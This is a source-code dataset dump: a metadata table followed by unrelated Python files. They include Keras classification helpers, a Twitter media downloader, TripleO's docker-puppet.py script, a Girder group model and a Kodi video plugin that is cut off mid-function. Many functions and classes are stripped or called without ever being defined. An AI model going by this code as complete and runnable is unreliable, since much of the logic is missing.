hexsha (stringlengths 40-40) | size (int64, 5-2.06M) | ext (stringclasses, 11 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 3-251) | max_stars_repo_name (stringlengths 4-130) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64, 1-191k, ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24, ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24, ⌀) | max_issues_repo_path (stringlengths 3-251) | max_issues_repo_name (stringlengths 4-130) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64, 1-116k, ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24, ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24, ⌀) | max_forks_repo_path (stringlengths 3-251) | max_forks_repo_name (stringlengths 4-130) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64, 1-105k, ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24, ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24, ⌀) | content (stringlengths 1-1.05M) | avg_line_length (float64, 1-1.02M) | max_line_length (int64, 3-1.04M) | alphanum_fraction (float64, 0-1)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
4c1514125da0b6d26946b5990ca8e3d69b019fd3 | 1,369 | py | Python | tests/core/feature_extraction/test_galaxyProcessor.py | EmilioCC/gti770-student-framework | 3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a | ["MIT"] | null | null | null | tests/core/feature_extraction/test_galaxyProcessor.py | EmilioCC/gti770-student-framework | 3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a | ["MIT"] | null | null | null | tests/core/feature_extraction/test_galaxyProcessor.py | EmilioCC/gti770-student-framework | 3cd72da8fe78c7ecfc26c9e688cbe1b7deee353a | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
from unittest import TestCase
from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor
from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy
from commons.helpers.dataset.context import Context
| 42.78125 | 103 | 0.731921 |
4c1540d22f910c13d547019d54ee005a23d41b8e | 559 | py | Python | country/management/commands/populate_countries.py | okchaty/django-country | 740bc25956dc1b87f44486538a62037e0bd0ac94 | ["MIT"] | 1 | 2020-04-02T16:50:38.000Z | 2020-04-02T16:50:38.000Z | country/management/commands/populate_countries.py | okchaty/django-country | 740bc25956dc1b87f44486538a62037e0bd0ac94 | ["MIT"] | 4 | 2020-03-30T15:39:55.000Z | 2020-04-10T15:04:28.000Z | country/management/commands/populate_countries.py | okchaty/django-country | 740bc25956dc1b87f44486538a62037e0bd0ac94 | ["MIT"] | null | null | null |
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
| 27.95 | 56 | 0.615385 |
4c155f18a1b1670b63f094d3de08857496d9f8be | 1,630 | py | Python | gmso/formats/formats_registry.py | chrisiacovella/gmso | c78e2425ccb98ea952f024a569346d36045f6918 | ["MIT"] | 20 | 2020-02-28T21:47:54.000Z | 2022-02-14T20:13:56.000Z | gmso/formats/formats_registry.py | chrisiacovella/gmso | c78e2425ccb98ea952f024a569346d36045f6918 | ["MIT"] | 364 | 2020-03-02T16:11:57.000Z | 2022-03-29T00:57:00.000Z | gmso/formats/formats_registry.py | chrisiacovella/gmso | c78e2425ccb98ea952f024a569346d36045f6918 | ["MIT"] | 28 | 2020-02-28T21:12:30.000Z | 2022-01-31T21:02:30.000Z |
"""Registry utilities to handle formats for gmso Topology."""
SaversRegistry = Registry()
LoadersRegistry = Registry()
| 28.596491 | 86 | 0.655828 |
4c1606fa8a8ca96d6fb7ac7c7412b894e0bb3a10 | 417 | py | Python | formatter.py | Staist/Python-Text-Formatter | 6ae865d45301906eaa133551301dc785602f5b38 | ["MIT"] | null | null | null | formatter.py | Staist/Python-Text-Formatter | 6ae865d45301906eaa133551301dc785602f5b38 | ["MIT"] | null | null | null | formatter.py | Staist/Python-Text-Formatter | 6ae865d45301906eaa133551301dc785602f5b38 | ["MIT"] | null | null | null |
# Delete every occurrence of a user-supplied string from a .txt file.
# (Variable names are Turkish: dosyaadi = file name, dosyaicerigi = file
# contents, silinecek = text to delete.)
dosyaadi = input("Enter file name: ")
dosyaadi = str(dosyaadi + ".txt")
with open(dosyaadi, 'r') as file:
    dosyaicerigi = file.read()
silinecek = str(input("Enter the text that you wish to delete: "))
dosyaicerigi = dosyaicerigi.replace(silinecek, '')
with open(dosyaadi, 'w') as file:
    file.write(dosyaicerigi)
# The 'with' blocks close the file automatically; no explicit close() needed.
print("-" * 30)
print("Successfully deleted!")
print("-" * 30)
| 26.0625 | 67 | 0.647482 |
4c168858057ebcae4ef4e91a7860a8034fcefa15 | 6,106 | py | Python | covid19/classification/helpers.py | salvacarrion/mltests | e4ac9711c1c80171f302edc88011fbe06e754490 | ["MIT"] | null | null | null | covid19/classification/helpers.py | salvacarrion/mltests | e4ac9711c1c80171f302edc88011fbe06e754490 | ["MIT"] | 1 | 2022-01-01T06:09:26.000Z | 2022-01-01T06:09:26.000Z | covid19/classification/helpers.py | salvacarrion/mltests | e4ac9711c1c80171f302edc88011fbe06e754490 | ["MIT"] | null | null | null |
import tensorflow as tf
class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
    pass  # class body truncated in this extract


class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
    pass  # class body truncated in this extract
def get_losses():
losses = [tf.keras.losses.BinaryCrossentropy()]
return losses
def get_metrics(single_output_idx, add_normal=False):
metrics = []
if single_output_idx is None: # Multi-label
print("###### Multi-label classification ######")
metrics += [
BinaryAccuracy_Infiltrates,
BinaryAccuracy_Pneumonia,
BinaryAccuracy_Covid19
]
# Add normal class
if add_normal:
metrics.append(BinaryAccuracy_Normal)
else:
print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
metrics = [
tf.keras.metrics.BinaryAccuracy(),
tf.keras.metrics.AUC(),
tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()
]
return metrics
def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
istrainable = not freeze_base_model
# Select backbone
if backbone == "resnet50":
from tensorflow.keras.applications.resnet import ResNet50 as TFModel
from tensorflow.keras.applications.resnet import preprocess_input
elif backbone == "resnet50v2":
from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "resnet101v2":
from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "vgg16":
from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
from tensorflow.keras.applications.vgg16 import preprocess_input
elif backbone == "efficientnetb0":
from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
elif backbone == "efficientnetb7":
from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
else:
raise ValueError(f"Unknown backbone: {backbone}")
if ignore_model:
model = None
else:
# Instantiate base model with pre-trained weights
base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")
# Freeze base model
# base_model.trainable = istrainable
for layers in base_model.layers:
layers.trainable = istrainable
# Create a new model on top
inputs = base_model.input
x = base_model(inputs)
# Option A
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
# Option B
# x = tf.keras.layers.Flatten(name='flatten')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)
# Outputs
outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)
model = tf.keras.Model(inputs, outputs)
return model, preprocess_input
def add_tabular_input(model, classes):
# Input1
input1 = model.input
input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")
# Pre-outputs 1x3 + 1x3
output1 = model.output
output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)
# Outputs
x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)
model = tf.keras.Model([input1, input2], output)
return model
def unfreeze_base_model(model, n=None, unfreeze=True):
base_model = model.layers[1].layers
# Select number of layers to unfreeze
idx = 0
if n is not None:
if isinstance(n, int):
idx = n
print(f"Unfreezing {len(base_model) - idx} layers")
elif isinstance(n, float) and 0.0 < n <= 1.0:
idx = int(len(base_model) * n)
print(f"Unfreezing {idx} layers")
else:
raise ValueError("Invalid number of layers")
# We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
for layer in base_model[-idx:]:
if not isinstance(layer, tf.keras.layers.BatchNormalization):
layer.trainable = True
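# Usage sketch (hypothetical call): unfreeze_base_model(model, n=0.25) makes
# the last 25% of the backbone's layers trainable, leaving BatchNorm frozen.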
| 35.5 | 104 | 0.664265 |
4c16d8f05cc4bb4747f1b27b93145e440fc653d6 | 3,528 | py | Python | null/twitter/twmedia-dl.py | mikoim/funstuff | 3c391c76784a4bb37983c1a251773bfa61182ce1 | ["MIT"] | null | null | null | null/twitter/twmedia-dl.py | mikoim/funstuff | 3c391c76784a4bb37983c1a251773bfa61182ce1 | ["MIT"] | null | null | null | null/twitter/twmedia-dl.py | mikoim/funstuff | 3c391c76784a4bb37983c1a251773bfa61182ce1 | ["MIT"] | null | null | null |
import re
import json
import time
import sys
import httplib2
from twitter import *
import magic
if __name__ == '__main__':
for i in range(1, len(sys.argv)):
tw = TwitterMediaDL()
for tweetID in tw.get_medias(sys.argv[i]):
list_url = tw.get_image_url(tweetID)
for j in range(0, len(list_url)):
raw = tw.http_wrapper(list_url[j])
ext = tw.get_file_extension(raw)
with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f:
f.write(raw)
| 30.947368 | 133 | 0.552721 |
4c16fb50407c0d81665fb35d2265d078805475a6 | 6,185 | py | Python | tensorflow/contrib/metrics/__init__.py | DEVESHTARASIA/tensorflow | d3edb8c60ed4fd831d62833ed22f5c23486c561c | ["Apache-2.0"] | 384 | 2017-02-21T18:38:04.000Z | 2022-02-22T07:30:25.000Z | tensorflow/contrib/metrics/__init__.py | ChenAugustus/tensorflow | 5828e285209ff8c3d1bef2e4bd7c55ca611080d5 | ["Apache-2.0"] | 15 | 2017-03-01T20:18:43.000Z | 2020-05-07T10:33:51.000Z | udacity-car/lib/python2.7/site-packages/tensorflow/contrib/metrics/__init__.py | 808brick/CarND-Capstone | f9e536b4a9d96322d7e971073602c8969dbd9369 | ["MIT"] | 81 | 2017-02-21T19:31:19.000Z | 2022-02-22T07:30:24.000Z |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.
See the @{$python/contrib.metrics} guide.
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| 51.97479 | 104 | 0.864834 |
4c189de34ca4832b1a00970032415cde76a25896 | 9,133 | py | Python | girder/models/group.py | scottwittenburg/girder | a5062badc97bf2a87a385648f2ff3f9ff1990a75 | ["Apache-2.0"] | null | null | null | girder/models/group.py | scottwittenburg/girder | a5062badc97bf2a87a385648f2ff3f9ff1990a75 | ["Apache-2.0"] | null | null | null | girder/models/group.py | scottwittenburg/girder | a5062badc97bf2a87a385648f2ff3f9ff1990a75 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
from .model_base import AccessControlledModel,\
ValidationException,\
AccessException
from girder.constants import AccessType
| 34.858779 | 79 | 0.581518 |
4c193e499f0f1632e4dcf16c607003de7e5c3eaa | 14,091 | py | Python | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | ["Apache-2.0"] | null | null | null | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | ["Apache-2.0"] | null | null | null | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.
import glob
import json
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
log.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# this is to match what we do in deployed-server
process_count = int(os.environ.get('PROCESS_COUNT',
multiprocessing.cpu_count()))
log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
json_data = json.load(f)
# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.
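# For example (hypothetical data): two entries sharing config_volume 'heat',
# one with puppet_tags 'heat_config' and one with 'heat_api_config', merge
# into a single entry whose puppet_tags become 'heat_config,heat_api_config'
# and whose manifests are concatenated.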
configs = {}
for service in (json_data or []):
if service is None:
continue
if isinstance(service, dict):
service = [
service.get('config_volume'),
service.get('puppet_tags'),
service.get('step_config'),
service.get('config_image'),
service.get('volumes', []),
]
config_volume = service[0] or ''
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if not manifest or not config_image:
continue
log.info('config_volume %s' % config_volume)
log.info('puppet_tags %s' % puppet_tags)
log.info('manifest %s' % manifest)
log.info('config_image %s' % config_image)
log.info('volumes %s' % volumes)
# We key off of config volume for all configs.
if config_volume in configs:
# Append puppet tags and manifest.
log.info("Existing service, appending puppet tags and manifest")
if puppet_tags:
configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
puppet_tags)
if manifest:
configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
manifest)
if configs[config_volume][3] != config_image:
log.warn("Config containers do not match even though"
" shared volumes are the same!")
else:
log.info("Adding new service")
configs[config_volume] = service
log.info('Service compilation completed.')
# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []
for config_volume in configs:
service = configs[config_volume]
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if puppet_tags:
puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
else:
puppet_tags = "file,file_line,concat,augeas"
process_map.append([config_volume, puppet_tags, manifest, config_image, volumes])
for p in process_map:
log.debug('- %s' % p)
# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
if returncode != 0:
log.error('ERROR configuring %s' % config_volume)
success = False
# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
with open(infile) as f:
infile_data = json.load(f)
for k, v in infile_data.iteritems():
config_volume = match_config_volume(config_volume_prefix, v)
if config_volume:
config_hash = get_config_hash(config_volume_prefix, config_volume)
if config_hash:
env = v.get('environment', [])
env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
infile_data[k]['environment'] = env
outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
with open(outfile, 'w') as out_f:
json.dump(infile_data, out_f)
if not success:
sys.exit(1)
| 39.581461 | 139 | 0.613299 |
4c1a065c357d38d64659fb6993766afa52a31235 | 9,999 | py | Python | main.py | acitv/plugin.video.aci | c836096c90affd80949e51cd24517709a63eff52 | ["MIT"] | null | null | null | main.py | acitv/plugin.video.aci | c836096c90affd80949e51cd24517709a63eff52 | ["MIT"] | null | null | null | main.py | acitv/plugin.video.aci | c836096c90affd80949e51cd24517709a63eff52 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import urllib
import urlparse
# import xbmc
import xbmcgui
import xbmcplugin
import aci
# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])
# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()
# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
'Firefox/47.0 FirePHP/0.7.4',
'X-Requested-With': 'ShockwaveFlash/22.0.0.192'
})
def get_url(**kwargs):
"""
Create a URL for calling the plugin recursively from the given set of keyword arguments.
:param kwargs: "argument=value" pairs
:type kwargs: dict
:return: plugin call URL
:rtype: str
"""
return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))
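# Usage sketch (the exact plugin id in the URL depends on sys.argv[0]):
#   get_url(action='listing', category='shows')
#   -> 'plugin://plugin.video.aci/?action=listing&category=shows'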
def get_categories():
"""
Get the list of video categories.
Here you can insert some parsing code that retrieves
the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
from some site or server.
.. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:return: The list of video categories
:rtype: types.GeneratorType
"""
return ATV.aci.iterkeys()
def get_videos(category):
"""
Get the list of video files/streams.
Here you can insert some parsing code that retrieves
the list of video streams in the given category from some site or server.
.. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:param category: Category name
:type category: str
:return: the list of videos in the category
:rtype: list
"""
return ATV.aci[category]
def list_categories():
"""
Create the list of video categories in the Kodi interface.
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, 'ACI')
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get video categories
categories = get_categories()
# Iterate through categories
for category in categories:
# xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=category.title())
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': "icon.png",
'icon': "icon.png",
'fanart': "icon.png"})
# Set additional info for the list item.
# Here we use a category name for both properties for simplicity's sake.
# setInfo allows to set various information for an item.
# For available properties see the following link:
# https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
# 'mediatype' is needed for a skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': category.title(),
'genre': category.title(),
'mediatype': 'video'})
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=listing&category=[category name]
url = get_url(action="listing", category=category)
# is_folder = True means that this item opens a sub-list of lower level items.
is_folder = True
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
"""
Create the list of playable videos in the Kodi interface.
:param category: Category name
:type category: str
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, category)
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get the list of videos in the category.
videos = get_videos(category)
# Iterate through each video.
for video_id in videos:
# Get the video item to process.
video_item = videos[video_id]
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=video_item["title"])
# Set additional info for the list item.
# 'mediatype' is needed for skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': video_item["title"],
'genre': category.title(),
'mediatype': 'video'})
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': video_item["thumbnail"],
'icon': video_item["thumbnail"],
'fanart': video_item["thumbnail"]
})
# Set 'IsPlayable' property to 'true'.
# This is mandatory for playable items!
list_item.setProperty('IsPlayable', 'true')
referer_header = urllib.urlencode({"Referer": video_item["location"]})
video_item['url'] += '|%s&%s' % (user_agent_headers, referer_header)
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=play&
# video=[video url]
url = get_url(action='play', video=video_item['url'])
# video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
# '&streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
# '&|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
# 'FirePHP/0.7.4&X-Requested-With=ShockwaveFlash/22.0.0.192&Referer=' + \
# urllib.quote_plus(video['reference'])
# url = get_url(action='play', video=video_url)
# Add the list item to a virtual Kodi folder.
# is_folder = False means that this item won't open any sub-list.
is_folder = False
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(path):
"""
Play a video by the provided path.
:param path: Fully-qualified video URL
:type path: str
"""
# Create a playable item with a path to play.
play_item = xbmcgui.ListItem(path=path)
# Play with inputstream addon.
play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring: URL encoded plugin paramstring
:type paramstring: str
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(urlparse.parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Load the videos for aci.
if params['category'] == "shows":
ATV.update_aci_shows()
print("Updated from main shows.")
elif params['category'] == "cable":
ATV.update_aci_cable()
print("Updated from main cable.")
elif params['category'] == "movies":
ATV.update_aci_movies()
print("Updated from main movies.")
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the provided paramstring does not contain a supported action
# we raise an exception. This helps to catch coding errors,
# e.g. typos in action names.
